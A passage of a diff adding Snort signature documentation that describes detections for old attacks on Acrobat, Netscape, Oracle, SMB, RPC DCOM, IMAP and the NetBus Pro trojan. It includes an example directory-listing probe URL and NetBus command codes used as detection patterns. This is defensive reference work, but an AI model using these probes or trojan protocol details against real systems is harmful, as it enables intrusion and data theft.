+This rule detects attempts to overflow the heap of the Adobe Acrobat/Acrobat 
+Reader ActiveX control, pdf.ocx. URI requests of 1,050 bytes or greater which 
+are received by this control will cause a buffer overflow and allow arbitrary 
+code execution with the privileges of the affected user. This rule is used in 
+conjunction with SID 100000100.
+
+--
+Affected Systems:
+Adobe Acrobat 5.0
+Adobe Acrobat 5.0.5
+Adobe Acrobat 6.0
+Adobe Acrobat 6.0.1
+Adobe Acrobat Reader 5.0
+Adobe Acrobat Reader 5.0.5
+Adobe Acrobat Reader 5.1
+Adobe Acrobat Reader 6.0
+Adobe Acrobat Reader 6.0.1
+
+--
+
+Attack Scenarios: 
+A web browser or automated script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as simply typing a long URI into a web browser will suffice.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Upgrade to Adobe Acrobat/Acrobat Reader 6.0.2.
+An alternate workaround is available: disable "Display PDF in browser" under 
+Edit -> Preferences.
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+http://www.adobe.com/support/downloads/thankyou.jsp?ftpID=2589&fileID=2433
+
+--
--- /dev/null
+++ b/doc/signatures/1188.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid:
+1188
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in some versions of Netscape Enterprise Server.
+ 
+--
+Impact:
+Information leak which could provide an attacker with the data needed to
+launch further attacks or gain more detailed information about your web server.
+
+--
+Detailed Information:
+A user can see a directory listing by appending a Web Publishing command
+to the end of a directory URL, for example: "http://www.sun.com/?wp-start-ver".
+
+This exploit will work on Netscape Enterprise Server regardless of
+directory indexing settings.  
+
+It will not work on iPlanet Web Server if directory indexing is set to
+"none" or "fancy" (the default). Web Publishing need not be enabled for
+this exploit to work.
+
+--
+Affected Systems:
+	Netscape Enterprise Server 3.0, 3.51 and 3.6
+
+-- 
+Attack Scenarios:
+The gathering of information such as directory listings is valuable when
+planning to attack a web server. 
+
+--
+Ease of Attack:
+Simple. No exploit software required however, an automated tool for
+scanning exists as does an exploit script.
+
+--
+False Positives:
+A web server that uses URLs which contain web publishing commands.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable directory indexing. For earlier versions of Netscape Enterprise
+Server, this may not fix the problem. On iPlanet, you can also change
+the indexing type to "fancy".
+
+To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8.
+
+--
+Contributors:
+Snort documentation contributed by Kevin Peuhkurinen
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+iPlanet Knowledge Base Article 4302:
+http://knowledgebase.iplanet.com/ikb/kb/articles/4302.html 
+
+iPlanet Knowledge Base Article 7761:
+http://knowledgebase.iplanet.com/ikb/kb/articles/7761.html 
+
+--
--- /dev/null
+++ b/doc/signatures/100000852.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000852
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "IceWarp" application running on a webserver. Access to the file "include.php" using a remote file being passed as the "lang_settings" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "lang_settings" parameter in the "include.php" script used by the "IceWarp" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using IceWarp
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1987.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1987
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a flaw in the
+X Windows Font Service.
+
+--
+Impact:
+Arbitrary code execution. Denial of Service.
+
+--
+Detailed Information:
+Certain versions of XFS distributed with Sun's Solaris are vulnerable to
+a remote buffer overflow. The Dispatch() routine within fs.auto does not
+provide adequate bounds-checking.
+
+--
+Affected Systems:
+	Sun Solaris 2.5.1 to 9 (Update 2)
+
+--
+Attack Scenarios:
+An attacker must have access to tcp port 7100. The attacker can then 
+either cause XFS to crash or run code as user "nobody".
+
+--
+Ease of Attack:
+Difficult
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable XFS in the inetd configuration file (normally /etc/inetd.conf 
+under line fs.auto).
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=11188
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1317
+
+--
--- /dev/null
+++ b/doc/signatures/3136.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3136
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
--- /dev/null
+++ b/doc/signatures/2756.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2756
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_update_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1687.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1687
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3009.txt
@@ -0,0 +1,115 @@
+Rule: 
+
+--
+Sid: 
+3009
+
+-- 
+Summary:
+This event is generated when an attempt is made to request a connection
+using the NetBus Pro 2.0 Trojan.
+
+-- 
+Impact: 
+If connected, the attacker could execute files remotely on your computer,
+capture an image of your desktop, send messages, steal your passwords,
+open and close your CD-ROM, play sounds, print documents, and even
+shutdown or reboot your computer, among many other things. The attacker
+will have almost total control of the PC should he connect successfully.
+
+--
+Detailed Information:
+NetBus Pro 2.0 incorporates its own protocol. It uses port 20034 by
+default, but it can be changed by the attacker.
+
+Its packets included a ten byte header followed by the packet's encrypted
+data. The first two bytes of the header are static: 42 4E.  The next two
+bytes indicate the size of the packet, followed by two bytes
+for the version number, followed by two random bytes, and the final ninth
+and tenth byte make up the command code. To look for an attack from one of
+these functions, the header of the suspicious packet will look like:
+
+	42 4E S1 S2 V1 V2 R1 R2 C1 C2
+
+NOTE: S1 and S2 are size byte one and size byte two. V1 and V2 are version
+number byte one and version number byte two. R1 and R2 are random bytes
+one and two. C1 and C2 are the command code bytes.
+
+The following is a list of the command codes for many of Net Bus Pro 2.0's
+functions:
+
+	Capture Desktop Image: 41 01
+	CD-ROM Open and Close: 60 01
+	Client Chat: 08 00
+	Execute File: 30 01
+	Reading Directory Listing: 50 00
+	Directory Traversal: 51 00
+	Go To URL: 33 01
+	Keyboard Tricks: 61 01
+	Keylogger: 40 01
+	Mouse Tricks: 65 01
+	Open Document: 33 01
+	Play Sound: 31 01
+	Plugin Manager: 90 00
+	Print Document: 34 01
+	Record Sound: 43 01
+	Redirect Application: 10 01
+	Redirect Port: 00 01
+	Registry Manager: 70 00
+	Remote Control: 73 01 and 72 01
+	Send Message: 40 00
+	Send Text: 64 01
+	Show Image: 32 01
+	Sound System: 80 00
+	System Administrator: 21 00
+	System Information: 30 00
+	Windows Manager: 60 00
+	Any Windows Exit Function(Shutdown, Reboot, etc.): 50 01
+
+--
+Affected Systems:
+Windows 95/98/ME/NT/2000
+
+--
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files
+because they often can be backdoor programs in disguise.
+
+Once the victim mistakenly installs the server program, the attacker
+will usually employ an IP scanner program to find the IP addresses of
+victims that have installed the program. The attacker then enters the IP
+address, port number (which is assigned to the server program by the
+attacker: default is 20034), and presses the connect button to gain access
+to the targeted system.
+
+-- 
+Ease of Attack: 
+Simple. Trojan Horse programs are widely available.
+
+-- 
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+Corrective Action: 
+In order to get rid of it, you will have to uninstall the program,
+deleting the folder and its contents or uninstalling it from the
+Add/Remove Programs option under the control panel. The Trojan usually
+does not attempt to hide itself, making the process of finding it much easier.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky Macatee <rmacatee@sourcefire.com> 
+
+-- 
+Additional References:
+
+Dark-E:
+http://www.dark-e.com/archive/trojans/netbus/200/index.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/1388.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1388
+
+--
+Summary:
+This event is generated when a remote user attempts to send a NOTIFY directive with an overly long Location URL to an internal host's Universal Plug and Play (UPnP) server.
+
+--
+Impact:
+Attempted administrator access.  A successful attack may cause a denial of service or permit the execution of arbitrary code with administrator privileges.
+
+--
+Detailed Information:
+The UPnP is used to find network-based devices.  Specifically, UPnP NOTIFY directives are employed to advertise the existence of UPnP devices on the network.  A vulnerability exists that permits a malformed NOTIFY directive with an overly long Location URL to cause a buffer overflow on the remote host listening on UPnP.  The buffer overflow attack may permit the execution of arbitrary code on the host with administrator privileges.
+
+--
+
+Affected Systems:
+Microsoft Windows 98, 98SE, ME, XP
+
+--
+Attack Scenarios:
+An attacker may obtain craft a malformed NOTIFY directive to execute arbitrary code on the victim host.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+This event will be generated if external hosts are permitted to query for UPnP devices.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block inbound UPnP traffic.
+
+--
+Contributors:
+Original rule writer unknown.
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0876
+
+--
--- /dev/null
+++ b/doc/signatures/1490.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1490
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in a php application. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in php applications.
+
+The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack against that host using that information.
+
+--
+Affected Systems:
+Any host using php.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the php application on the host. The attacker might then gain administrator access to the site or database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2904.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2904
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_snapshot_repobject
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3396.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3396
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2567.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2567
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1061.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1061
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+NGS Whitepaper - Advanced SQL Injection
+www.nextgenss.com/papers/advanced_sql_injection.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/518.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+
+Sid:
+518
+
+--
+
+Summary:
+This event is generated when a TFTP PUT request is made.  This is an indication that someone is attempting to create or place a file on the server.
+
+--
+
+Impact:
+A TFTP PUT requests allows a remote attacker to create, modify, or replace files on the server running TFTP.  If the TFTP server allows anonymous TFTP PUT requests it could be possible to upload malicious files and payloads to the server.
+
+--
+
+Detailed Information:
+This rule will generate an event on in-bound TFTP PUT requests.  Attackers my use TFTP to upload and download files from a server that is properly or improperly configured.  This could result in malicious payload being uploaded to the server or sensitive files being downloaded.
+
+--
+
+Attack Scenarios:
+Attackers may use TFTP to upload and download files from server that are properly or improperly configured.  Normally attackers attempt to locate TFTP servers using automated scanners and tools.  Once a TFTP server is located an attempt to write files and get files from the TFTP server is made.  Depending on the results of those tests attackers may attempt to further exploit that system, by overwriting system files or downloading password files to access the system.
+
+--
+
+Ease of Attack:
+Simple: Numerous tools and automated scripts exist for scanning large subnets for improperly configured TFTP servers.
+
+--
+
+False Positives:
+Legitimate TFTP PUT requests for updating routers or other access devices may trigger this rule.  
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+The TFTP server should be configured to only allow PUT requests from trusted locations.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski Matt.Watchinski@sourcefire.com
+
+--
+
+Additional References
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0183
+http://www.whitehats.com/info/IDS148
+
+
+--
--- /dev/null
+++ b/doc/signatures/3035.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3035
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2578.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2578
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a heap overflow
+associated with Kerberos V5.
+
+--
+Impact:
+A successful attack may cause a heap overflow, permitting the execution of
+arbitrary code.
+
+--
+Detailed Information:
+When Kerberos V5 uses a non-default configuration of enabling rules-based
+mapping, it is possible to cause a heap overflow and the subsequent
+execution of arbitrary code on the vulnerable host.  The attacker has
+to successfully authenticate in order to exploit the vulnerability.
+If an attacker supplies an overly long principal name, it may be possible
+to cause a heap overflow on the vulnerable Kerberos-enabled server.
+
+--
+Affected Systems:
+MIT Kerberos V5 including krb5-1.3.3
+
+--
+Attack Scenarios:
+An attacker authenticates to the Kerberos server and later supplies
+an overly long principle name when attempting to connect to a server
+that employs Kerberos authentication. This can cause a heap overflow
+and subsequent execution of code on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Dan Roelker <dan.roelker@sourcefire.com>
+
+--
+Additional References
+
+Other:
+http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2004-001-an_to_ln.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2119.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2119
+
+--
+Summary:
+This event is generated when a remote user uses the IMAP RENAME command
+to send a suspiciously long string to port 143 on an internal server.
+This may indicate an attempt to exploit a buffer overflow vulnerability
+in the IMAP RENAME command. This may also affect other IMAP implementations.
+
+Impact:
+Possible shell access on the IMAP server, leading to arbitrary code
+execution. The attacker must have a valid IMAP account on the mail
+server to attempt this exploit.
+
+--
+Detailed Information:
+When a large amount of data is sent to a vulnerable IMAP server in the
+RENAME command, a buffer overflow condition may occur. This can allow
+the attacker to access the shell, where arbitrary code can be executed.
+Note that this exploit can only be attempted by a user with a valid IMAP
+account.
+
+--
+Affected Systems:
+	University of Washington imapd versions 10.234 or 12.264. 
+
+--
+Attack Scenarios:
+An attacker with an IMAP account on the server can send a sufficiently
+long RENAME command to the IMAP server, creating a buffer overflow
+condition. This can then allow the attacker to gain shell access on the
+compromised server, possibly leading to the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the user must have a valid IMAP account on
+the server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate patches for your operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2978.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2978
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
--- /dev/null
+++ b/doc/signatures/2626.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2626
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "send_old_value" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by long strings in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to either the "sname" or
+"oname" variables to cause the overflow. The result could
+permit the attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the database
